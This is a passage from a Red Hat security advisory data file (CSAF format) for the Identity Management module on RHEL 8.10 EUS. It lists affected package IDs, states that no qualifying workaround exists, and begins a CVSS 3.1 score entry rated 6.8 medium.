"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:3267"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
